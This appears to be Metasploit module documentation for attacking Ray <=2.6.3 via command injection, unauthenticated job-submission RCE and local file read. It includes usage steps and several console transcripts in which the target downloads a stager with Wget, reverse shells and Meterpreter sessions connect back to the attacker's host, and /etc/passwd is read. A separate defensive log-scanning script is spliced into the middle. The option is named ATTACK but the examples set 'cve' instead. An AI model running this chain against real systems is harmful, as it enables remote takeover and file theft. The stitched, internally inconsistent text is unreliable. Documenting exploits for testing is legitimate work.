## Vulnerable Application

Ray (<=v2.6.3) is affected by three vulnerabilities:

* RCE via the `cpu_profile` command injection vulnerability (CVE-2023-6019)
* RCE via the agent job submission endpoint (no CVE)
* Local file inclusion (CVE-2023-6020)

This module exploits all three vulnerabilities.

The vulnerability affects:

* Ray (<=v2.6.3)

This module was successfully tested on:

* Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
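For defenders triaging dashboard access logs, the script below (an added example, not part of this module or of Ray) classifies constructed log lines against the three issue classes listed above: an exposed dashboard reached from a non-local client, shell metacharacters in `cpu_profile` parameters, job submissions, and traversal or absolute paths in file-read requests. The log line format, the `/worker/cpu_profile`, `/api/jobs/` and `/logs/file` paths, and the trusted-client set are assumptions, not values taken from the module.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; the "<client> <method> <path?query> <status>" format and paths are assumed.
SAMPLE_LOG = """\
127.0.0.1 GET /api/cluster_status 200
192.168.56.1 GET /worker/cpu_profile?pid=124&ip=172.17.0.2&format=flamegraph 200
192.168.56.1 GET /worker/cpu_profile?pid=124&ip=172.17.0.2&format=flamegraph%3Bid 500
192.168.56.1 POST /api/jobs/ 200
192.168.56.1 GET /logs/file?filename=..%2F..%2F..%2Fetc%2Fpasswd 200
"""

LINE_RE = re.compile(r"^(\S+) (GET|POST|PUT|DELETE) (\S+) (\d{3})$")
# Characters that end or chain a shell command; a profiler output format never needs them.
SHELL_META = re.compile(r"[;&|`$\n]")
# Assumption: the dashboard is only meant to be driven from the head node itself.
TRUSTED_CLIENTS = {"127.0.0.1"}


def classify(line):
    """Return finding tags for one log line; an empty list means nothing noteworthy."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    client, method, target, _status = m.groups()
    url = urlsplit(target)
    # parse_qs percent-decodes each value, so an encoded %3B is matched as ';'.
    values = [v for vs in parse_qs(url.query, keep_blank_values=True).values() for v in vs]
    findings = []
    if client not in TRUSTED_CLIENTS:
        findings.append("external-client")  # reachable because of --dashboard-host=0.0.0.0
    if url.path.endswith("/cpu_profile") and any(SHELL_META.search(v) for v in values):
        findings.append("cpu_profile-cmdi")  # CVE-2023-6019 pattern
    if method == "POST" and url.path.startswith("/api/jobs"):
        findings.append("job-submission")  # unauthenticated job submission (RCE, no CVE)
    if ".." in url.path or any(".." in v or v.startswith("/") for v in values):
        findings.append("file-read")  # CVE-2023-6020 style local file read
    return findings


def scan(log_text):
    """Map 1-based line numbers to their findings, skipping clean lines."""
    report = {}
    for n, line in enumerate(log_text.splitlines(), start=1):
        tags = classify(line)
        if tags:
            report[n] = tags
    return report
```

`scan(SAMPLE_LOG)` reports lines 2 to 5; line 1, a local request to a benign endpoint, is left out. Decoding before matching is what catches the `%3B` variant on line 3.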
### Install and run the vulnerable Ray (v2.6.3)

- Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
- Install Kali Linux (or another Linux distro) in your virtualization engine.
- Pull the pre-built Ray Docker container (v2.6.3) in your VM:
  ```
  docker pull rayproject/ray:2.6.3
  ```
- Start the Ray container:
  ```
  docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3
  ```
- Start Ray:
  ```
  ray start --head --dashboard-host=0.0.0.0
  ```
## Verification Steps

- Install the application
- Start msfconsole
- Do: `use exploit/linux/http/ray_cmdi_rce_lfi`
- Do: `set rhost <rhost>`
- Optional: `set rport <port>`
- Do: `set lhost <attacker-ip>`
- Optional: `set CVE <cve>`
- Do: `run`
- You should get a shell or meterpreter
## Options

### ATTACK (required)

This is the attack type to use. The default is `CMDi` (CVE-2023-6019); `RCE` (no CVE) and `LFI` (CVE-2023-6020) can also be chosen.

### COMMAND (optional)

This is the command to execute. The default is `echo 'Hello from Metasploit'`. It is used when ATTACK is set to `CMDi` or `RCE`.

### FILEPATH (optional)

This is the file to read. The default is `/etc/passwd`. It is used when ATTACK is set to `LFI`.
## Scenarios

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0)

```
msf6 > use exploit/linux/http/ray_cmdi_rce_lfi
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019
cve => CVE-2023-6019
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0
target => 0
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Grabbed node info, pid: 124, ip: 172.17.0.2
[+] Command execution seems to have been successful. Status code: 500
[*] Using URL: http://192.168.56.1:8080/VvzBBm8
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /VvzBBm8
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.56.6
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40554) at 2024-08-05 08:26:42 +0900
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 1)

```
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019
cve => CVE-2023-6019
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1
target => 1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Grabbed node info, pid: 124, ip: 172.17.0.2
[+] Command execution seems to have been successful. Status code: 500
[*] Using URL: http://192.168.56.1:8080/tMBeDO
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /tMBeDO
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:39652) at 2024-08-05 08:28:46 +0900
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.

whoami
ray
pwd
/home/ray
```
### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 0)

```
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE
cve => RCE
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0
target => 0
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_TKeWeJRKQZFkU2zN' Submission ID: 'raysubmit_TKeWeJRKQZFkU2zN'
[*] Using URL: http://192.168.56.1:8080/roy19E
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /roy19E
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (38 bytes) to 192.168.56.6
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:43312) at 2024-08-05 08:40:06 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray
```
### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 1)

```
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE
cve => RCE
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1
target => 1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_g4jZ3U5aQu4gYrFy' Submission ID: 'raysubmit_g4jZ3U5aQu4gYrFy'
[*] Using URL: http://192.168.56.1:8080/ZMCKWGQCHh
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /ZMCKWGQCHh
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:42666) at 2024-08-05 08:41:22 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray
```
### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6020)

```
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6020
cve => CVE-2023-6020
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
```